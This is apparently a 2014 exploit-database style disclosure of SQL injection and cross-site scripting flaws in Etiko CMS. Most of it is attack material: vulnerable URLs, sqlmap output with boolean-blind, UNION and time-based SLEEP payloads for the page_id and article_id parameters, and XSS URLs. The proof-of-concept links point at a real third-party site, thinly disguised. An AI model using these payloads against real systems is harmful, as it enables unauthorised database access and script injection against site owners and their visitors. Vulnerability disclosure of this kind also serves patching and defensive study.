# SQL Injection & XSS on Etiko CMS. # Risk: High # CWE number: CWE-89,CWE-79 # Date: 13/10/2014 # Vendor: www.etikweb.com # Version: All # Author: Felipe " Renzi " Gabriel # Contact: renzi@linuxmail.org # Tested on: Windows 8 ; Chrome ; Sqlmap 1.0-dev-nongit-20140906 # Vulnerables Files: /index.php & /loja/index.php # Exploits: http://www.target.com/loja/index.php?page_id=19 [XSS] & [SQLi] http://www.target.com/index.php?article_id=16 [SQLi] & [XSS] # PoC: http://www.centrXovegetariano.org/loja/index.php?page_id=19 http://www.centrovegXetariano.org/index.php?article_id=16 --- "SQLI using SQLMAP."--- --- Place: GET Parameter: page_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page_id=19' AND 3987=3987 AND 'Tulh'='Tulh Type: UNION query Title: MySQL UNION query (NULL) - 3 columns Payload: page_id=-5362' UNION ALL SELECT NULL,NULL,CONCAT(0x7175616f71,0x467a784a6e62664d5a79,0x716b756271)# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: page_id=19' AND SLEEP(5) AND 'mntS'='mntS --- --- Place: GET Parameter: article_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: article_id=16' AND 8044=8044 AND 'yKZe'='yKZe Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: article_id=-2752' UNION ALL SELECT 60,60,60,60,60,60,CONCAT(0x7167687671,0x6d54706b774f4a6f667a,0x7172707a71),60,60,60# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: article_id=16' AND SLEEP(5) AND 'MDwY'='MDwY --- --- " XSS using HTML injection."--- http://www.centrovegXetariano.org/loja/index.php?page_id=19"><marquee>XSS</marquee> http://www.centroveXgetariano.org/index.php?article_id=16"><marquee>XSS</marquee> # Thank's